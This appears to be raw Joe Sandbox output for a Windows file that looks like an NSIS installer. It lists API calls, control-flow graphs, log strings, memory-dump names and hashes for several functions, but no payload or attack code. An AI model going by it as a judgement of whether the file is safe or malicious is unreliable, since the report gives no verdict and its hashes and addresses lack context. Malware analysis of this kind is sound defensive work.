                                                                                                      • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004052AC
                                                                                                      • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004052B8
                                                                                                      • GetDlgItem.USER32(?,000003F8), ref: 00405179
                                                                                                        • Part of subcall function 00403DC4: SendMessageW.USER32(00000028,?,00000001,004057E0), ref: 00403DD2
                                                                                                        • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00427979,759223A0,00000000), ref: 00406902
                                                                                                        • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                        • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                      • GetDlgItem.USER32(?,000003EC), ref: 004052D7
                                                                                                      • CreateThread.KERNELBASE(00000000,00000000,Function_00005073,00000000), ref: 004052E5
                                                                                                      • CloseHandle.KERNELBASE(00000000), ref: 004052EC
                                                                                                      • ShowWindow.USER32(00000000), ref: 00405313
                                                                                                      • ShowWindow.USER32(?,00000008), ref: 00405318
                                                                                                      • ShowWindow.USER32(00000008), ref: 0040535F
                                                                                                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405391
                                                                                                      • CreatePopupMenu.USER32 ref: 004053A2
                                                                                                      • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004053B7
                                                                                                      • GetWindowRect.USER32(?,?), ref: 004053CA
                                                                                                      • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004053EC
                                                                                                      • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405427
                                                                                                      • OpenClipboard.USER32(00000000), ref: 00405437
                                                                                                      • EmptyClipboard.USER32 ref: 0040543D
                                                                                                      • GlobalAlloc.KERNEL32(00000042,00000000,?,?,00000000,?,00000000), ref: 00405449
                                                                                                      • GlobalLock.KERNEL32(00000000), ref: 00405453
                                                                                                      • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405467
                                                                                                      • GlobalUnlock.KERNEL32(00000000), ref: 00405489
                                                                                                      • SetClipboardData.USER32(0000000D,00000000), ref: 00405494
                                                                                                      • CloseClipboard.USER32 ref: 0040549A
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2031220901.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2031206862.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031236638.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031419014.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlockVersionlstrlenwvsprintf
                                                                                                      • String ID: New install of "%s" to "%s"${
                                                                                                      • API String ID: 2110491804-1641061399
                                                                                                      • Opcode ID: 27dd6abe78b25364254968db719b86f88dfe8c12dd5559a56974b496927f2e5b
                                                                                                      • Instruction ID: db3ff0878cedf1d1b3e6f9985675ba3e3c8e3ad145c0decdf5c07b0ce3ef5d1a
                                                                                                      • Opcode Fuzzy Hash: 27dd6abe78b25364254968db719b86f88dfe8c12dd5559a56974b496927f2e5b
                                                                                                      • Instruction Fuzzy Hash: 46B15970900609BFEB11AFA1DD89EAE7B79FB04354F00803AFA05BA1A1C7755E81DF58
                                                                                                      Function 004038AF Relevance: 52.8, APIs: 22, Strings: 8, Instructions: 304filestringcomCOMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 202 4038af-403945 #17 SetErrorMode OleInitialize call 406328 SHGetFileInfoW call 406035 GetCommandLineW call 406035 GetModuleHandleW 209 403947-40394a 202->209 210 40394f-403963 call 405d32 CharNextW 202->210 209->210 213 4039f6-4039fc 210->213 214 403a02 213->214 215 403968-40396e 213->215 216 403a21-403a39 GetTempPathW call 4037f8 214->216 217 403970-403976 215->217 218 403978-40397c 215->218 228 403a3b-403a59 GetWindowsDirectoryW lstrcatW call 4037f8 216->228 229 403a5f-403a79 DeleteFileW call 4035b3 216->229 217->217 217->218 219 403984-403988 218->219 220 40397e-403983 218->220 222 4039e4-4039f1 call 405d32 219->222 223 40398a-403991 219->223 220->219 222->213 237 4039f3 222->237 226 403993-40399a 223->226 227 4039a6-4039b8 call 40382c 223->227 232 4039a1 226->232 233 40399c-40399f 226->233 242 4039ba-4039c1 227->242 243 4039cd-4039e2 call 40382c 227->243 228->229 240 403af8-403b07 call 403885 CoUninitialize 228->240 229->240 241 403a7b-403a81 229->241 232->227 233->227 233->232 237->213 257 403bfa-403c00 240->257 258 403b0d-403b1d call 405ccc ExitProcess 240->258 244 403ae1-403ae8 call 405958 241->244 245 403a83-403a8c call 405d32 241->245 247 4039c3-4039c6 242->247 248 4039c8 242->248 243->222 254 403a04-403a1c call 40824c call 406035 243->254 256 403aed-403af3 call 406113 244->256 260 403aa5-403aa7 245->260 247->243 247->248 248->243 254->216 256->240 262 403c02-403c1f call 406328 * 3 257->262 263 403c7d-403c85 257->263 267 403aa9-403ab3 260->267 268 403a8e-403aa0 call 40382c 260->268 293 403c21-403c23 262->293 294 403c69-403c74 ExitWindowsEx 262->294 269 403c87 263->269 270 403c8b 263->270 275 403b23-403b3d lstrcatW lstrcmpiW 267->275 276 403ab5-403ac5 call 4067aa 267->276 268->267 283 403aa2 268->283 269->270 275->240 277 403b3f-403b55 CreateDirectoryW SetCurrentDirectoryW 275->277 276->240 286 403ac7-403add call 406035 * 2 276->286 281 403b62-403b82 call 406035 * 2 277->281 282 403b57-403b5d call 406035 277->282 303 403b87-403ba3 call 406831 DeleteFileW 281->303 282->281 283->260 286->244 293->294 297 403c25-403c27 293->297 294->263 300 403c76-403c78 call 40141d 294->300 297->294 301 403c29-403c3b GetCurrentProcess 297->301 300->263 301->294 308 403c3d-403c5f 301->308 309 403be4-403bec 303->309 310 403ba5-403bb5 CopyFileW 303->310 308->294 309->303 311 403bee-403bf5 call 406c94 309->311 310->309 312 403bb7-403bd7 call 406c94 call 406831 call 405c6b 310->312 311->240 312->309 322 403bd9-403be0 CloseHandle 312->322 322->309
                                                                                                      APIs
                                                                                                      • #17.COMCTL32 ref: 004038CE
                                                                                                      • SetErrorMode.KERNELBASE(00008001), ref: 004038D9
                                                                                                      • OleInitialize.OLE32(00000000), ref: 004038E0
                                                                                                        • Part of subcall function 00406328: GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
                                                                                                        • Part of subcall function 00406328: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
                                                                                                        • Part of subcall function 00406328: GetProcAddress.KERNEL32(00000000), ref: 00406353
                                                                                                      • SHGetFileInfoW.SHELL32(0040A264,00000000,?,000002B4,00000000), ref: 00403908
                                                                                                        • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                                      • GetCommandLineW.KERNEL32(00476AA0,NSIS Error), ref: 0040391D
                                                                                                      • GetModuleHandleW.KERNEL32(00000000,004CF0A0,00000000), ref: 00403930
                                                                                                      • CharNextW.USER32(00000000,004CF0A0,00000020), ref: 00403957
                                                                                                      • GetTempPathW.KERNEL32(00002004,004E30C8,00000000,00000020), ref: 00403A2C
                                                                                                      • GetWindowsDirectoryW.KERNEL32(004E30C8,00001FFF), ref: 00403A41
                                                                                                      • lstrcatW.KERNEL32(004E30C8,\Temp), ref: 00403A4D
                                                                                                      • DeleteFileW.KERNELBASE(004DF0C0), ref: 00403A64
                                                                                                      • CoUninitialize.COMBASE(?), ref: 00403AFD
                                                                                                      • ExitProcess.KERNEL32 ref: 00403B1D
                                                                                                      • lstrcatW.KERNEL32(004E30C8,~nsu.tmp), ref: 00403B29
                                                                                                      • lstrcmpiW.KERNEL32(004E30C8,004DB0B8,004E30C8,~nsu.tmp), ref: 00403B35
                                                                                                      • CreateDirectoryW.KERNEL32(004E30C8,00000000), ref: 00403B41
                                                                                                      • SetCurrentDirectoryW.KERNEL32(004E30C8), ref: 00403B48
                                                                                                      • DeleteFileW.KERNEL32(0043DD40,0043DD40,?,00483008,0040A204,0047F000,?), ref: 00403B99
                                                                                                      • CopyFileW.KERNEL32(004EB0D8,0043DD40,00000001), ref: 00403BAD
                                                                                                      • CloseHandle.KERNEL32(00000000,0043DD40,0043DD40,?,0043DD40,00000000), ref: 00403BDA
                                                                                                      • GetCurrentProcess.KERNEL32(00000028,00000005,00000005,00000004,00000003), ref: 00403C30
                                                                                                      • ExitWindowsEx.USER32(00000002,00000000), ref: 00403C6C
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2031220901.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2031206862.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031236638.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031419014.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: File$DirectoryHandle$CurrentDeleteExitModuleProcessWindowslstrcat$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextPathProcTempUninitializelstrcmpilstrcpyn
                                                                                                      • String ID: /D=$ _?=$Error launching installer$NCRC$NSIS Error$SeShutdownPrivilege$\Temp$~nsu.tmp
                                                                                                      • API String ID: 2435955865-3712954417
                                                                                                      • Opcode ID: aec89c4631a4f28101b36bf3f0ee1ca0be396cf3d13a1cbdd2f96bcbf360b5e4
                                                                                                      • Instruction ID: 6e3717b9be2730fff72f59090edb21b77de3e5055cb75e9aafb2752c1f1d7b94
                                                                                                      • Opcode Fuzzy Hash: aec89c4631a4f28101b36bf3f0ee1ca0be396cf3d13a1cbdd2f96bcbf360b5e4
                                                                                                      • Instruction Fuzzy Hash: 1DA1E6715443117AD720BF629C4AE1B7EACAB0470AF10443FF545B62D2D7BD8A448BAE
                                                                                                      Function 00406301 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14fileCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • FindFirstFileW.KERNELBASE(00461E18,00466A20,00461E18,004067FA,00461E18), ref: 0040630C
                                                                                                      • FindClose.KERNEL32(00000000), ref: 00406318
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2031220901.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2031206862.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031236638.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031419014.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Find$CloseFileFirst
                                                                                                      • String ID: jF
                                                                                                      • API String ID: 2295610775-3349280890
                                                                                                      • Opcode ID: a5aa16d55819016c4e26a60e9ec5dfcaedf525e35b4e30500cf5e78c71265be2
                                                                                                      • Instruction ID: ae54cbf5f70e9060ab25dbcc7d0ddb8e13a77f3b50f8061b144b06f1ffcf0783
                                                                                                      • Opcode Fuzzy Hash: a5aa16d55819016c4e26a60e9ec5dfcaedf525e35b4e30500cf5e78c71265be2
                                                                                                      • Instruction Fuzzy Hash: C8D01231A141215BD7105778AD0C89B7E9CDF0A330366CA32F866F11F5D3348C2186ED
                                                                                                      Function 00406328 Relevance: 4.5, APIs: 3, Instructions: 18libraryloaderCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
                                                                                                      • LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
                                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 00406353
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2031220901.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2031206862.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031236638.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031419014.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressHandleLibraryLoadModuleProc
                                                                                                      • String ID:
                                                                                                      • API String ID: 310444273-0
                                                                                                      • Opcode ID: 2fa3fc2bddc204e922c82fa426c5bb1cc5fbaa7aed8e5e7daaeaf6592e3c6ac6
                                                                                                      • Instruction ID: 7c6873576e710d3586a353c563cf751ff2fc1cfd2ce2d1275f1b712779c4e249
                                                                                                      • Opcode Fuzzy Hash: 2fa3fc2bddc204e922c82fa426c5bb1cc5fbaa7aed8e5e7daaeaf6592e3c6ac6
                                                                                                      • Instruction Fuzzy Hash: A8D01232200111D7C7005FA5AD48A5FB77DAE95A11706843AF902F3171E734D911E6EC
                                                                                                      Function 004015A0 Relevance: 56.4, APIs: 15, Strings: 17, Instructions: 351sleepfilewindowCOMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 56 4015a0-4015f4 57 4030e3-4030ec 56->57 58 4015fa 56->58 86 4030ee-4030f2 57->86 60 401601-401611 call 4062cf 58->60 61 401742-40174f 58->61 62 401962-40197d call 40145c GetFullPathNameW 58->62 63 4019ca-4019e6 call 40145c SearchPathW 58->63 64 40176e-401794 call 40145c call 4062cf SetFileAttributesW 58->64 65 401650-40166d call 40137e call 4062cf call 40139d 58->65 66 4017b1-4017d8 call 40145c call 4062cf call 405d85 58->66 67 401672-401686 call 40145c call 4062cf 58->67 68 401693-4016ac call 401446 call 4062cf 58->68 69 401715-401731 58->69 70 401616-40162d call 40145c call 4062cf call 404f9e 58->70 71 4016d6-4016db 58->71 72 401736-40173d 58->72 73 401897-4018a7 call 40145c call 406301 58->73 74 4018db-401910 call 40145c * 3 call 4062cf MoveFileW 58->74 75 40163c-401645 58->75 76 4016bd-4016d1 call 4062cf SetForegroundWindow 58->76 60->86 77 401751-401755 ShowWindow 61->77 78 401758-40175f 61->78 117 4019a3-4019a8 62->117 118 40197f-401984 62->118 63->57 123 4019ec-4019f8 63->123 64->57 136 40179a-4017a6 call 4062cf 64->136 65->86 160 401864-40186c 66->160 161 4017de-4017fc call 405d32 CreateDirectoryW 66->161 137 401689-40168e call 404f9e 67->137 142 4016b1-4016b8 Sleep 68->142 143 4016ae-4016b0 68->143 69->86 94 401632-401637 70->94 92 401702-401710 71->92 93 4016dd-4016fd call 401446 71->93 96 4030dd-4030de 72->96 138 4018c2-4018d6 call 4062cf 73->138 139 4018a9-4018bd call 4062cf 73->139 172 401912-401919 74->172 173 40191e-401921 74->173 75->94 95 401647-40164e PostQuitMessage 75->95 76->57 77->78 78->57 99 401765-401769 ShowWindow 78->99 92->57 93->57 94->86 95->94 96->57 113 4030de call 405f7d 96->113 99->57 113->57 130 4019af-4019b2 117->130 129 401986-401989 118->129 118->130 123->57 123->96 129->130 140 40198b-401993 call 406301 129->140 130->57 144 4019b8-4019c5 GetShortPathNameW 130->144 155 4017ab-4017ac 136->155 137->57 138->86 139->86 140->117 165 401995-4019a1 call 406035 140->165 142->57 143->142 144->57 155->57 163 401890-401892 160->163 164 40186e-40188b call 404f9e call 406035 SetCurrentDirectoryW 160->164 176 401846-40184e call 4062cf 161->176 177 4017fe-401809 GetLastError 161->177 163->137 164->57 165->130 172->137 178 401923-40192b call 406301 173->178 179 40194a-401950 173->179 192 401853-401854 176->192 182 401827-401832 GetFileAttributesW 177->182 183 40180b-401825 GetLastError call 4062cf 177->183 178->179 193 40192d-401948 call 406c94 call 404f9e 178->193 181 401957-40195d call 4062cf 179->181 181->155 190 401834-401844 call 4062cf 182->190 191 401855-40185e 182->191 183->191 190->192 191->160 191->161 192->191 193->181
                                                                                                      APIs
                                                                                                      • PostQuitMessage.USER32(00000000), ref: 00401648
                                                                                                      • Sleep.KERNELBASE(00000000,?,00000000,00000000,00000000), ref: 004016B2
                                                                                                      • SetForegroundWindow.USER32(?), ref: 004016CB
                                                                                                      • ShowWindow.USER32(?), ref: 00401753
                                                                                                      • ShowWindow.USER32(?), ref: 00401767
                                                                                                      • SetFileAttributesW.KERNEL32(00000000,00000000,?,000000F0), ref: 0040178C
                                                                                                      • CreateDirectoryW.KERNELBASE(?,00000000,00000000,0000005C,?,?,?,000000F0,?,000000F0), ref: 004017F4
                                                                                                      • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 004017FE
                                                                                                      • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 0040180B
                                                                                                      • GetFileAttributesW.KERNELBASE(?,?,?,000000F0,?,000000F0), ref: 0040182A
                                                                                                      • SetCurrentDirectoryW.KERNELBASE(?,004D70B0,?,000000E6,004100F0,?,?,?,000000F0,?,000000F0), ref: 00401885
                                                                                                      • MoveFileW.KERNEL32(00000000,?), ref: 00401908
                                                                                                      • GetFullPathNameW.KERNEL32(00000000,00002004,00000000,?,00000000,000000E3,004100F0,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 00401975
                                                                                                      • GetShortPathNameW.KERNEL32(00000000,00000000,00002004), ref: 004019BF
                                                                                                      • SearchPathW.KERNELBASE(00000000,00000000,00000000,00002004,00000000,?,000000FF,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 004019DE
                                                                                                      Strings
                                                                                                      • Jump: %d, xrefs: 00401602
                                                                                                      • IfFileExists: file "%s" exists, jumping %d, xrefs: 004018AD
                                                                                                      • Rename failed: %s, xrefs: 0040194B
                                                                                                      • Rename: %s, xrefs: 004018F8
                                                                                                      • CreateDirectory: can't create "%s" - a file already exists, xrefs: 00401837
                                                                                                      • detailprint: %s, xrefs: 00401679
                                                                                                      • Call: %d, xrefs: 0040165A
                                                                                                      • IfFileExists: file "%s" does not exist, jumping %d, xrefs: 004018C6
                                                                                                      • CreateDirectory: "%s" (%d), xrefs: 004017BF
                                                                                                      • CreateDirectory: can't create "%s" (err=%d), xrefs: 00401815
                                                                                                      • Sleep(%d), xrefs: 0040169D
                                                                                                      • SetFileAttributes failed., xrefs: 004017A1
                                                                                                      • SetFileAttributes: "%s":%08X, xrefs: 0040177B
                                                                                                      • BringToFront, xrefs: 004016BD
                                                                                                      • Aborting: "%s", xrefs: 0040161D
                                                                                                      • CreateDirectory: "%s" created, xrefs: 00401849
                                                                                                      • Rename on reboot: %s, xrefs: 00401943
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2031220901.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2031206862.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031236638.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031419014.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FilePathWindow$AttributesDirectoryErrorLastNameShow$CreateCurrentForegroundFullMessageMovePostQuitSearchShortSleep
                                                                                                      • String ID: Aborting: "%s"$BringToFront$Call: %d$CreateDirectory: "%s" (%d)$CreateDirectory: "%s" created$CreateDirectory: can't create "%s" (err=%d)$CreateDirectory: can't create "%s" - a file already exists$IfFileExists: file "%s" does not exist, jumping %d$IfFileExists: file "%s" exists, jumping %d$Jump: %d$Rename failed: %s$Rename on reboot: %s$Rename: %s$SetFileAttributes failed.$SetFileAttributes: "%s":%08X$Sleep(%d)$detailprint: %s
                                                                                                      • API String ID: 2872004960-3619442763
                                                                                                      • Opcode ID: cb44afc3f00204bc7321e8aa54be61598e0149da34aa070ef9c2be04eb5c6a73
                                                                                                      • Instruction ID: d546d874ac51cf0a7c72b7d7aee7a5a926bf82a1b22bfeef9e4f81a1fba4758f
                                                                                                      • Opcode Fuzzy Hash: cb44afc3f00204bc7321e8aa54be61598e0149da34aa070ef9c2be04eb5c6a73
                                                                                                      • Instruction Fuzzy Hash: 9EB1F435A00214ABDB10BFA1DD55DAE3F69EF44324B21817FF806B61E2DA3D4E40C66D
                                                                                                      Function 004054A5 Relevance: 48.3, APIs: 32, Instructions: 345windowstringCOMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 323 4054a5-4054b7 324 4055f9-405608 323->324 325 4054bd-4054c3 323->325 327 405657-40566c 324->327 328 40560a-405652 GetDlgItem * 2 call 403d6b SetClassLongW call 40141d 324->328 325->324 326 4054c9-4054d2 325->326 331 4054d4-4054e1 SetWindowPos 326->331 332 4054e7-4054ea 326->332 329 4056ac-4056b1 call 403ddb 327->329 330 40566e-405671 327->330 328->327 342 4056b6-4056d1 329->342 334 405673-40567e call 40139d 330->334 335 4056a4-4056a6 330->335 331->332 337 405504-40550a 332->337 338 4054ec-4054fe ShowWindow 332->338 334->335 356 405680-40569f SendMessageW 334->356 335->329 341 40594c 335->341 343 405526-405529 337->343 344 40550c-405521 DestroyWindow 337->344 338->337 351 40594e-405955 341->351 349 4056d3-4056d5 call 40141d 342->349 350 4056da-4056e0 342->350 346 40552b-405537 SetWindowLongW 343->346 347 40553c-405542 343->347 352 405929-40592f 344->352 346->351 354 4055e5-4055f4 call 403df6 347->354 355 405548-405559 GetDlgItem 347->355 349->350 359 4056e6-4056f1 350->359 360 40590a-405923 DestroyWindow KiUserCallbackDispatcher 350->360 352->341 357 405931-405937 352->357 354->351 361 405578-40557b 355->361 362 40555b-405572 SendMessageW IsWindowEnabled 355->362 356->351 357->341 364 405939-405942 ShowWindow 357->364 359->360 365 4056f7-405744 call 406831 call 403d6b * 3 GetDlgItem 359->365 360->352 366 405580-405583 361->366 367 40557d-40557e 361->367 362->341 362->361 364->341 393 405746-40574c 365->393 394 40574f-40578b ShowWindow KiUserCallbackDispatcher call 403db1 EnableWindow 365->394 372 405591-405596 366->372 373 405585-40558b 366->373 371 4055ae-4055b3 call 403d44 367->371 371->354 376 4055cc-4055df SendMessageW 372->376 378 405598-40559e 372->378 373->376 377 40558d-40558f 373->377 376->354 377->371 381 4055a0-4055a6 call 40141d 378->381 382 4055b5-4055be call 40141d 378->382 391 4055ac 381->391 382->354 390 4055c0-4055ca 382->390 390->391 391->371 393->394 397 405790 394->397 398 40578d-40578e 394->398 399 405792-4057c0 GetSystemMenu EnableMenuItem SendMessageW 397->399 398->399 400 4057c2-4057d3 SendMessageW 399->400 401 4057d5 399->401 402 4057db-405819 call 403dc4 call 406035 lstrlenW call 406831 SetWindowTextW call 40139d 400->402 401->402 402->342 411 40581f-405821 402->411 411->342 412 405827-40582b 411->412 413 40584a-40585e DestroyWindow 412->413 414 40582d-405833 412->414 413->352 416 405864-405891 CreateDialogParamW 413->416 414->341 415 405839-40583f 414->415 415->342 418 405845 415->418 416->352 417 405897-4058ee call 403d6b GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 40139d 416->417 417->341 423 4058f0-405903 ShowWindow call 403ddb 417->423 418->341 425 405908 423->425 425->352
                                                                                                      APIs
                                                                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004054E1
                                                                                                      • ShowWindow.USER32(?), ref: 004054FE
                                                                                                      • DestroyWindow.USER32 ref: 00405512
                                                                                                      • SetWindowLongW.USER32(?,00000000,00000000), ref: 0040552E
                                                                                                      • GetDlgItem.USER32(?,?), ref: 0040554F
                                                                                                      • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00405563
                                                                                                      • IsWindowEnabled.USER32(00000000), ref: 0040556A
                                                                                                      • GetDlgItem.USER32(?,00000001), ref: 00405619
                                                                                                      • GetDlgItem.USER32(?,00000002), ref: 00405623
                                                                                                      • SetClassLongW.USER32(?,000000F2,?), ref: 0040563D
                                                                                                      • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 0040568E
                                                                                                      • GetDlgItem.USER32(?,00000003), ref: 00405734
                                                                                                      • ShowWindow.USER32(00000000,?), ref: 00405756
                                                                                                      • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00405768
                                                                                                      • EnableWindow.USER32(?,?), ref: 00405783
                                                                                                      • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00405799
                                                                                                      • EnableMenuItem.USER32(00000000), ref: 004057A0
                                                                                                      • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 004057B8
                                                                                                      • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004057CB
                                                                                                      • lstrlenW.KERNEL32(00451D98,?,00451D98,00476AA0), ref: 004057F4
                                                                                                      • SetWindowTextW.USER32(?,00451D98), ref: 00405808
                                                                                                      • ShowWindow.USER32(?,0000000A), ref: 0040593C
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2031220901.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2031206862.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031236638.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
